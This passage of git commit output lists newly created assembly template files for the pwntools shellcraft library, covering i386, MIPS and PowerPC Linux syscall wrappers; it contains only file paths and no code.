pwnlib/shellcraft/templates/i386/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/i386/memcpy.asm create mode 100644 pwnlib/shellcraft/templates/i386/prolog.asm create mode 100644 pwnlib/shellcraft/templates/i386/pushstr_array.asm create mode 100644 pwnlib/shellcraft/templates/i386/stackarg.asm create mode 100644 pwnlib/shellcraft/templates/i386/strcpy.asm create mode 100644 pwnlib/shellcraft/templates/i386/strlen.asm create mode 100644 pwnlib/shellcraft/templates/i386/xor.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/cat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/connect.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/dup.asm create mode 100644 
pwnlib/shellcraft/templates/mips/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/echo.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/exit.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/forkbomb.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ftruncate.asm create mode 100644 
pwnlib/shellcraft/templates/mips/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/iopl.asm create mode 100644 
pwnlib/shellcraft/templates/mips/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/killparent.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/listen.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/munlockall.asm create mode 100644 
pwnlib/shellcraft/templates/mips/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ptrace.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/remap_file_pages.asm 
create mode 100644 pwnlib/shellcraft/templates/mips/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setregid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setresuid.asm create mode 100644 
pwnlib/shellcraft/templates/mips/linux/setreuid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sh.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/timer_gettime.asm create mode 100644 
pwnlib/shellcraft/templates/mips/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/write.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/mips/nop.asm create mode 100644 pwnlib/shellcraft/templates/mips/push.asm create mode 100644 pwnlib/shellcraft/templates/mips/pushstr.asm create mode 100644 pwnlib/shellcraft/templates/mips/setregs.asm create mode 100644 pwnlib/shellcraft/templates/mips/trap.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/__doc__ create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/__doc__ create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/accept.asm create mode 100644 
pwnlib/shellcraft/templates/powerpc/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/connect.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/dup.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/exit.asm create mode 100644 
pwnlib/shellcraft/templates/powerpc/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getpgrp.asm create mode 100644 
pwnlib/shellcraft/templates/powerpc/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/listen.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mincore.asm create mode 100644 
pwnlib/shellcraft/templates/powerpc/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ppoll.asm create mode 100644 
pwnlib/shellcraft/templates/powerpc/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ptrace.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/read.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_getparam.asm 
create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setregid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setreuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigaltstack.asm create 
mode 100644 pwnlib/shellcraft/templates/powerpc/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigreturn.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/uname.asm 
